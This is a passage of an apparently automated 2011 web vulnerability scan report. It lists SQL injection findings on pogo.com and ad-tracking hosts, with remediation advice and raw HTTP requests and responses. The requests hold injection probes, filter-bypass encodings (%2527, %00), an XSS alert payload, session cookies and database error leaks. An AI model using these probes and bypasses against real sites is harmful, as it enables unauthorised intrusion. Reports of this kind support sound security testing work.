SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /static/rtb/sync-min.html'%20and%201%3d1--%20 HTTP/1.1 Host: assets.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; rdk15=0; ses15=4762^1
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 234 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:02:09 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html' and 1=1-- was not found o ...[SNIP]... </p> </body></html>
Request 2
GET /static/rtb/sync-min.html'%20and%201%3d2--%20 HTTP/1.1 Host: assets.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; rdk15=0; ses15=4762^1
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 325 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:02:09 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html' and 1=2-- was not found o ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /static/rtb'%20and%201%3d1--%20/sync-min.html/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 235 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:03:54 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb' and 1=1-- /sync-min.html/ was not found ...[SNIP]... </p> </body></html>
Request 2
GET /static/rtb'%20and%201%3d2--%20/sync-min.html/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 326 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:03:54 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb' and 1=2-- /sync-min.html/ was not found ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 21123539'%20or%201%3d1--%20 and 21123539'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /static/rtb/sync-min.html21123539'%20or%201%3d1--%20/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 242 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:03:55 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html21123539' or 1=1-- / was not ...[SNIP]... </p> </body></html>
Request 2
GET /static/rtb/sync-min.html21123539'%20or%201%3d2--%20/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 333 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:03:55 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html21123539' or 1=2-- / was not ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html>
1.4. http://clubpogo-games.pogo.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://clubpogo-games.pogo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17880153%20or%201%3d1--%20 and 17880153%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?117880153%20or%201%3d1--%20=1 HTTP/1.1 Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Request 2
GET /?117880153%20or%201%3d2--%20=1 HTTP/1.1 Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The ahst parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ahst parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ahst request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com%2527&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
The apid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the apid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules%2527&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
The rkey parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rkey parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357'&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%00'; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
The 51270 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 51270 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /1x1.php?51270' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/action/pogo/confirmation.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:45 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 682 Content-Type: text/html
<br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204 Stack trace: #0 ...[SNIP]...
Request 2
GET /1x1.php?51270'' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/action/pogo/confirmation.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2 (redirected)
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:48 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Content-Type: image/gif
GIF89a...................!.......,...........T..;
1.10. http://link.mavnt.com/1x1.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://link.mavnt.com
Path:
/1x1.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /1x1.php?1'=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:20 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 675 Connection: close Content-Type: text/html
<br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204 Stack trace: #0 /var/d ...[SNIP]...
Request 2
GET /1x1.php?1''=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2 (redirected)
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:20 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Connection: close Content-Type: image/gif
The 51270 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 51270 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /1x1_map.php?51270' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/action/pogo/confirmation.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:37 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 682 Content-Type: text/html
<br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204 Stack trace: #0 ...[SNIP]...
Request 2
GET /1x1_map.php?51270'' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/action/pogo/confirmation.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:39 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Content-Type: image/gif
GIF89a...................!.......,...........T..;
1.12. http://link.mavnt.com/1x1_map.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://link.mavnt.com
Path:
/1x1_map.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /1x1_map.php?1'=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:23 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 675 Connection: close Content-Type: text/html
<br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204 Stack trace: #0 /var/d ...[SNIP]...
Request 2
GET /1x1_map.php?1''=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:23 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Connection: close Content-Type: image/gif
The ses15 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ses15 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /a/4252/4762/6670-15.js?cb= HTTP/1.1 Host: optimized-by.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ses15=4762^2'; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rpb=4210%3D1%264214%3D1; csi2=3156581.js^2^1294536526^1294536590&3146355.js^1^1294536507^1294536507; rdk=4252/4762; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3188204.js^1^1294536315^1294536315; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=4762^3; cd=false;
Response 1
HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html
<html><body><h1>504 Gateway Time-out</h1> The server didn't respond in time. </body></html>
Request 2
GET /a/4252/4762/6670-15.js?cb= HTTP/1.1 Host: optimized-by.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ses15=4762^2''; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rpb=4210%3D1%264214%3D1; csi2=3156581.js^2^1294536526^1294536590&3146355.js^1^1294536507^1294536507; rdk=4252/4762; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3188204.js^1^1294536315^1294536315; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=4762^3; cd=false;
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:25:40 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:40 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 03:25:40 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses15=4762^3; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106459; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^2^1294536315^1294539940; expires=Sun, 16-Jan-2011 02:25:40 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391
The rsid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rsid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:13:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 202
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2
Request 2
GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response 2
